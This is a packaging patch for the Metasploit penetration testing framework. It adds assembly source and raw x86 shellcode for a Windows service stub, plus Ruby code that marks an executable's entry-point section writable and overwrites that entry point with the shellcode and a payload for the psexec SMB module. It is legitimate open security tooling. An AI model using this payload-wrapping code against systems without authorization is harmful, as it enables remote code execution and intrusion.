net-analyzer/metasploit/files/agix_psexec_pull-2657.patch


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219

diff -Naur metasploit-9999.orig/external/source/shellcode/windows/x86/src/block/block_service.asm metasploit-9999/external/source/shellcode/windows/x86/src/block/block_service.asm
--- metasploit-9999.orig/external/source/shellcode/windows/x86/src/block/block_service.asm	1970-01-01 01:00:00.000000000 +0100
+++ metasploit-9999/external/source/shellcode/windows/x86/src/block/block_service.asm	2013-11-20 11:50:48.256366095 +0100
@@ -0,0 +1,64 @@
+;-----------------------------------------------------------------------------;
+; Author: agix (florian.gaultier[at]gmail[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Size: 137 bytes
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+; Input: EBP must be the address of 'api_call'.
+
+push byte 0x0
+push 0x32336970
+push 0x61766461
+push esp
+push 0x726774c
+call ebp		;load advapi32.dll
+push 0x00454349
+push 0x56524553
+mov ecx, esp	;ServiceTableEntry.SVCNAME
+lea eax, [ebp+0xd0];ServiceTableEntry.SvcMain
+push 0x00000000
+push eax
+push ecx
+mov eax,esp
+push 0x00000000
+push eax
+push 0xCB72F7FA
+call ebp		;call StartServiceCtrlDispatcherA(ServiceTableEntry)
+push 0x00000000
+push 0x56A2B5F0
+call ebp		;call ExitProcess(0)
+pop eax			;SvcCtrlHandler
+pop eax
+pop eax
+pop eax
+xor eax,eax
+ret
+cld 			;SvcMain
+call me
+me:
+pop ebp
+sub ebp, 0xd6	;ebp => hashFunction
+push 0x00464349
+push 0x56524553
+mov ecx, esp	;SVCNAME
+lea eax, [ebp+0xc9];SvcCtrlHandler
+push 0x00000000
+push eax
+push ecx
+push 0x5244AA0B
+call ebp		;RegisterServiceCtrlHandlerExA
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000000
+push 0x00000004
+push 0x00000010
+mov ecx, esp
+push 0x00000000
+push ecx
+push eax
+push 0x7D3755C6
+call ebp		;SetServiceStatus RUNNING
\ No newline at end of file
diff -Naur metasploit-9999.orig/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm metasploit-9999/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm
--- metasploit-9999.orig/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm	1970-01-01 01:00:00.000000000 +0100
+++ metasploit-9999/external/source/shellcode/windows/x86/src/single/single_service_stuff.asm	2013-11-20 11:50:48.256366095 +0100
@@ -0,0 +1,17 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (28 July 2009)
+; Size: 189 bytes + strlen(libpath) + 1
+; Build: >build.py single_service_stuff
+;-----------------------------------------------------------------------------;
+
+[BITS 32]
+[ORG 0]
+
+  cld                    ; Clear the direction flag.
+  call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+%include "./src/block/block_api.asm"
+start:                   ;
+  pop ebp                ; pop off the address of 'api_call' for calling later.
+%include "./src/block/block_service.asm"
\ No newline at end of file
diff -Naur metasploit-9999.orig/lib/msf/util/exe.rb metasploit-9999/lib/msf/util/exe.rb
--- metasploit-9999.orig/lib/msf/util/exe.rb	2013-11-20 11:50:31.748365346 +0100
+++ metasploit-9999/lib/msf/util/exe.rb	2013-11-20 11:50:48.256366095 +0100
@@ -402,36 +402,86 @@
 
     case opts[:exe_type]
       when :service_exe
+        exe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
         max_length = 8192
         name = opts[:servicename]
 
-        if name
-          bo = pe.index('SERVICENAME')
-          raise RuntimeError, "Invalid PE Service EXE template: missing \"SERVICENAME\" tag" if not bo
-          pe[bo, 11] = [name].pack('a11')
+        if not name
+          name = Rex::Text.rand_text_alpha(7)
         end
-
-        if not opts[:sub_method]
-          pe[136, 4] = [rand(0x100000000)].pack('V')
+        #code_service could be encoded in the future
+        code_service =
+        "\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
+        "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
+        "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
+        "\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
+        "\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
+        "\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
+        "\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
+        "\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
+        "\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
+        "\x6A\x00\x68\x70\x69\x33\x32\x68\x61\x64\x76\x61\x54\x68\x4C\x77" +
+        "\x26\x07\xFF\xD5\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1" +
+        "\x8D\x85\xD0\x00\x00\x00\x6A\x00\x50\x51\x89\xE0\x6A\x00\x50\x68" +
+        "\xFA\xF7\x72\xCB\xFF\xD5\x6A\x00\x68\xF0\xB5\xA2\x56\xFF\xD5\x58" +
+        "\x58\x58\x58\x31\xC0\xC3\xFC\xE8\x00\x00\x00\x00\x5D\x81\xED\xD6" +
+        "\x00\x00\x00\x68"+name[4,3]+"\x00\x68"+name[0,4]+"\x89\xE1\x8D" +
+        "\x85\xC9\x00\x00\x00\x6A\x00\x50\x51\x68\x0B\xAA\x44\x52\xFF\xD5" +
+        "\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x00\x6A\x04\x6A\x10" +
+        "\x89\xE1\x6A\x00\x51\x50\x68\xC6\x55\x37\x7D\xFF\xD5"
+
+        pe_header_size=0x18
+        section_size=0x28
+        characteristics_offset=0x24
+        virtualAddress_offset=0xc
+        sizeOfRawData_offset=0x10
+
+        sections_table_rva = exe._dos_header.v['e_lfanew']+exe._file_header.v['SizeOfOptionalHeader']+pe_header_size
+        sections_table_offset = exe.rva_to_file_offset(sections_table_rva)
+        sections_table_characteristics_offset = exe.rva_to_file_offset(sections_table_rva+characteristics_offset)
+
+        sections_header = []
+        exe._file_header.v['NumberOfSections'].times { |i|
+          sections_header << [sections_table_characteristics_offset+(i*section_size),pe[sections_table_offset+(i*section_size),section_size]]
+        }
+
+        #look for section with entry point
+        sections_header.each do |sec|
+          virtualAddress = sec[1][virtualAddress_offset,0x4].unpack('L')[0]
+          sizeOfRawData = sec[1][sizeOfRawData_offset,0x4].unpack('L')[0]
+          characteristics = sec[1][characteristics_offset,0x4].unpack('L')[0]
+          if exe.hdr.opt.AddressOfEntryPoint >= virtualAddress && exe.hdr.opt.AddressOfEntryPoint < virtualAddress+sizeOfRawData
+            #put this section writable
+            characteristics|=0x80000000
+            newcharacteristics = [characteristics].pack('L')
+            pe[sec[0],newcharacteristics.length]=newcharacteristics
+          end
         end
+
+        #put the shellcode at the entry point, overwriting template
+        pe[exe.rva_to_file_offset(exe.hdr.opt.AddressOfEntryPoint),code_service.length+code.length]=code_service+code
+
       when :dll
         max_length = 2048
       when :exe_sub
         max_length = 4096
     end
 
-    bo = pe.index('PAYLOAD:')
-    raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo
+    if opts[:exe_type] != :service_exe
 
-    if (code.length <= max_length)
-      pe[bo, code.length] = [code].pack("a*")
-    else
-      raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module"
-    end
+      bo = pe.index('PAYLOAD:')
+      raise RuntimeError, "Invalid PE EXE subst template: missing \"PAYLOAD:\" tag" if not bo
 
-    if opts[:exe_type] == :dll
-      mt = pe.index('MUTEX!!!')
-      pe[mt,8] = Rex::Text.rand_text_alpha(8) if mt
+      if (code.length <= max_length)
+        pe[bo, code.length] = [code].pack("a*")
+      else
+        raise RuntimeError, "The EXE generator now has a max size of #{max_length} bytes, please fix the calling module"
+      end
+
+      if opts[:exe_type] == :dll
+        mt = pe.index('MUTEX!!!')
+        pe[mt,8] = Rex::Text.rand_text_alpha(8) if mt
+      end
     end
 
     return pe
@@ -463,7 +513,7 @@
 
   def self.to_win32pe_service(framework, code, opts={})
     # Allow the user to specify their own service EXE template
-    set_template_default(opts, "template_x86_windows_svc.exe")
+    set_template_default(opts, "template_x86_windows.exe")
     opts[:exe_type] = :service_exe
     exe_sub_method(code,opts)
   end
diff -Naur metasploit-9999.orig/modules/exploits/windows/smb/psexec.rb metasploit-9999/modules/exploits/windows/smb/psexec.rb
--- metasploit-9999.orig/modules/exploits/windows/smb/psexec.rb	2013-11-20 11:50:31.988365357 +0100
+++ metasploit-9999/modules/exploits/windows/smb/psexec.rb	2013-11-20 11:50:48.256366095 +0100
@@ -153,7 +153,7 @@
       # Disconnect from the ADMIN$
       simple.disconnect("ADMIN$")
     else
-      servicename = rand_text_alpha(8)
+      servicename = rand_text_alpha(7)
 
       # Upload the shellcode to a file
       print_status("Uploading payload...")